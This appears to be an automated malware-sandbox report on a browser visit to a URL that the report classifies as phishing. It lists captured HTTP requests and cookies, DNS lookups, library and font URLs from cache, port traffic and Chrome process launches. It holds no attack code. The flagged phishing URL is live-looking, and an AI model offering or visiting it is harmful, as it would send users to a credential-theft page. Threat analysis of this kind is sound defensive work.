        Source: global trafficHTTP traffic detected: GET /portbiz/icons/icon-blugov-info.svg HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yungbucksbbq.com/portbiz/css/blugov.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yungbucksbbq.com/portbiz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js? HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js? HTTP/1.1Host: yungbucksbbq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/8f7506295d20727b HTTP/1.1Host: yungbucksbbq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: yungbucksbbq.com
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
        Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
        Source: unknownHTTP traffic detected: POST /portbiz/ HTTP/1.1Host: yungbucksbbq.comConnection: keep-aliveContent-Length: 22sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Requested-TimeStamp-Expire: KFi17VeScpBaMNNnaVIgMfPVFWc: 44363248sec-ch-ua-mobile: ?0X-Requested-TimeStamp-Combination: X-Requested-Type-Combination: GETContent-type: application/x-www-form-urlencodedX-Requested-Type: GETUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Requested-with: XMLHttpRequestX-Requested-TimeStamp: sec-ch-ua-platform: "Windows"Accept: */*Origin: https://yungbucksbbq.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://yungbucksbbq.com/portbiz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Dec 2024 01:23:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-XSS-Protection: 1; mode=blockCache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutablePragma: publicCF-Cache-Status: HITAge: 125556Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CnI6lQniSES7VQMEKssjvhdkcA2UhdB9eAL7ETrMBffH6PzP6MFWIHqSFe8qdACGJ8LwyJRUxQH3ymGn0S%2F8AUxMHQ6a1dTy0rSZkVaNM9RBTwqmrpPgLTGZBmxDU1ADhT23"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f75064c5f11727b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1852&rtt_var=714&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1672&delivery_rate=1512169&cwnd=232&unsent_bytes=0&cid=f10382e9308d7d04&ts=1355&x=0"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Dec 2024 01:23:16 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-XSS-Protection: 1; mode=blockCache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutablePragma: publicCF-Cache-Status: HITAge: 125559Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQKD6%2FE1L43FiYY9RUqYV%2B9GFUtR6Oc92WratzqVo9SDtmwZVUQ59rmR1I4WNw0gjHFnm07wZ06kOp7Btgx%2BTfxdbbycJjUU0Gmm9ipN58HDaySnVEm3nmjn0ltaOb5nZQRT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f75065c48cc43b3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1593&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1664&delivery_rate=1833019&cwnd=198&unsent_bytes=0&cid=85e5327e084b8ac6&ts=452&x=0"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Dec 2024 01:23:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-XSS-Protection: 1; mode=blockCache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutablePragma: publicCF-Cache-Status: HITAge: 144119Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PAvOKoDfy1rHRiV%2F1HZdNRcubJkVzbzRRueR%2BApUay%2FU2r1ojCDAYKL00B1AIceZk%2B76QHkHWL8MS6pUgzsl70kcgZgREWodHkwomc8H7ZiYRLOeKLJS%2B5As%2FjZNYJxirN0A"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f75066eef700f5b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1626&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1627&delivery_rate=1742243&cwnd=218&unsent_bytes=0&cid=b83b0f0d999049fe&ts=458&x=0"
        Source: chromecache_75.1.drString found in binary or memory: http://getharvest.com
        Source: chromecache_86.1.dr, chromecache_84.1.drString found in binary or memory: http://opensource.org/licenses/MIT).
        Source: chromecache_79.1.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
        Source: chromecache_79.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
        Source: chromecache_79.1.drString found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fABc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBxc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCBc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCRc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fChc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fCxc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBBc4AMP6lQ.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBxc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fChc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCxc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfABc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4AMP6lQ.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBxc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCBc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCRc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfChc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCxc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmYUtfABc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmYUtfBBc4AMP6lQ.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmYUtfBxc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmYUtfCBc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmYUtfCRc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmYUtfChc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmYUtfCxc4AMP6lbBP.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4WxKKTU1Kvnz.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu5mxKKTU1Kvnz.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu72xKKTU1Kvnz.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7GxKKTU1Kvnz.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7WxKKTU1Kvnz.woff2)
        Source: chromecache_76.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7mxKKTU1Kvnz.woff2)
        Source: chromecache_89.1.dr, chromecache_82.1.drString found in binary or memory: https://getbootstrap.com)
        Source: chromecache_73.1.dr, chromecache_70.1.drString found in binary or memory: https://getbootstrap.com/)
        Source: chromecache_75.1.drString found in binary or memory: https://github.com/harvesthq/chosen
        Source: chromecache_75.1.drString found in binary or memory: https://github.com/harvesthq/chosen/blob/master/LICENSE.md
        Source: chromecache_89.1.dr, chromecache_73.1.dr, chromecache_70.1.dr, chromecache_82.1.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
        Source: chromecache_89.1.dr, chromecache_73.1.dr, chromecache_70.1.dr, chromecache_82.1.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
        Source: chromecache_79.1.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
        Source: chromecache_79.1.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: classification engineClassification label: mal84.phis.win@16/46@26/10
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2204,i,10793580977582758868,3268384068697070233,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://yungbucksbbq.com/portbiz/"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
